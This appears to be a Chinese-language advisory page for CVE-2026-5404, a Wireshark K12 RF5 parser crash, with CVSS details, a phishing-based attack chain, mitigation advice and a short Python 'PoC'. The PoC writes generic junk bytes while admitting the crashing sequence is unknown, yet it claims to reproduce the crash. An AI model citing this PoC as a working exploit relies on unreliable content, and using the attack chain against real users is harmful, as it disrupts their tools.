CVE-2026-5404 CVSS 4.7 中危

CVE-2026-5404 Wireshark拒绝服务漏洞

披露日期: 2026-05-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5404

漏洞类型

拒绝服务

CVSS评分

4.7 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Wireshark

漏洞概述

CVE-2026-5404是Wireshark网络协议分析工具中发现的一个安全漏洞。该漏洞影响Wireshark的4.6.0至4.6.4版本以及4.4.0至4.4.14版本。漏洞的根本原因在于K12 RF5文件解析器在处理特定格式的文件时存在缺陷，导致程序崩溃。攻击者可以通过诱导用户打开恶意构造的K12 RF5文件来触发此漏洞。虽然该漏洞主要影响系统的可用性，导致应用程序意外终止，但不会造成数据泄露或权限提升。鉴于Wireshark被广泛用于网络故障排查和安全分析，该漏洞可能对相关运维工作造成干扰。

技术细节

该漏洞属于拒绝服务类漏洞，技术原理涉及Wireshark对K12 RF5文件格式的解析逻辑。在解析过程中，特定的文件结构或字段可能触发边界检查失败或内存访问错误。根据CVSS向量分析，攻击向量为本地（AV:L），且需要用户交互（UI:R），这意味着攻击者无法直接通过网络远程利用该漏洞，必须依赖社会工程学手段。攻击者需制作一个恶意的K12 RF5文件，并通过邮件、文件共享等方式发送给目标用户。当目标用户使用受影响的Wireshark版本打开该文件时，解析器会尝试解码文件内容，进而触发异常导致进程崩溃。由于无需前置认证（PR:N），一旦用户执行了打开操作，漏洞即被触发，导致服务中断（A:H），但不会影响机密性（C:N）和完整性（I:N）。

攻击链分析

STEP 1

侦察

攻击者确认目标系统正在使用易受攻击的Wireshark版本（4.4.0-4.4.14或4.6.0-4.6.4）。

STEP 2

武器化

攻击者利用漏洞细节，构造一个特制的恶意K12 RF5文件，该文件包含导致解析器崩溃的特定字节序列。

STEP 3

投递

攻击者通过钓鱼邮件、恶意下载链接或局域网共享等渠道，将恶意文件发送给目标用户。

STEP 4

利用

诱导目标用户使用Wireshark打开该恶意文件，触发K12 RF5解析器的处理逻辑。

STEP 5

影响

Wireshark进程因解析错误而崩溃，导致网络分析服务中断（拒绝服务）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct

# PoC for CVE-2026-5404: Wireshark K12 RF5 File Parser Crash
# This script generates a malformed K12 RF5 file intended to trigger the crash.

def generate_malformed_rf5(filename):
    with open(filename, 'wb') as f:
        # K12 RF5 files typically start with a specific header.
        # This PoC attempts to fuzz the header structure to trigger the parser crash.
        # Note: The exact byte sequence causing the crash depends on the specific vulnerability details.
        
        # Writing a generic malformed header
        f.write(b'\x00' * 10)  # Malformed magic bytes or offset
        f.write(b'\xFF' * 50)  # Junk data to overflow buffer or confuse parser
        
        # Appending some payload that might trigger the parsing logic
        f.write(b'A' * 1000)

    print(f"[+] Malformed file '{filename}' generated successfully.")
    print(f"[+] Open this file in Wireshark 4.4.0 - 4.4.14 or 4.6.0 - 4.6.4 to reproduce the crash.")

if __name__ == "__main__":
    generate_malformed_rf5("crash.rf5")

影响范围

Wireshark 4.6.0 - 4.6.4

Wireshark 4.4.0 - 4.4.14

防御指南

临时缓解措施

在无法立即升级软件的情况下，建议网络管理员和安全分析师不要使用受影响版本的Wireshark打开未知的K12 RF5文件。可以对文件来源进行严格限制，仅处理可信网络环境中的捕获数据。此外，应关注Wireshark官方发布的安全公告WNPA-sec-2026-15，获取最新的补丁信息并及时应用。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表